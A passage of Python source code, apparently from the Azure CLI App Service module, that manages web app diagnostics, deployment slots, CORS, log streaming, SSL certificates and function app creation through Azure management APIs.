open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, runtime_version=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime].keys()
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {}. '
'Supported versions are: {}'
.format(runtime_version, runtime, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if is_consumption:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in RUNTIME_TO_IMAGE_FUNCTIONAPP.keys():
raise CLIError("An appropriate linux image for runtime:'{}' was not found".format(runtime))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(is_consumption, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_linux_fx_functionapp(is_consumption, runtime, runtime_version):
if runtime_version is None:
runtime_version = RUNTIME_TO_DEFAULT_VERSION[runtime]
if is_consumption:
return '{}|{}'.format(runtime.upper(), runtime_version)
# App service or Elastic Premium
return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime][runtime_version])
def _get_website_node_version_functionapp(runtime, runtime_version):
if runtime is None or runtime != 'node':
return NODE_VERSION_DEFAULT_FUNCTIONAPP
if runtime_version is not None:
return '~{}'.format(runtime_version)
return NODE_VERSION_DEFAULT_FUNCTIONAPP
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
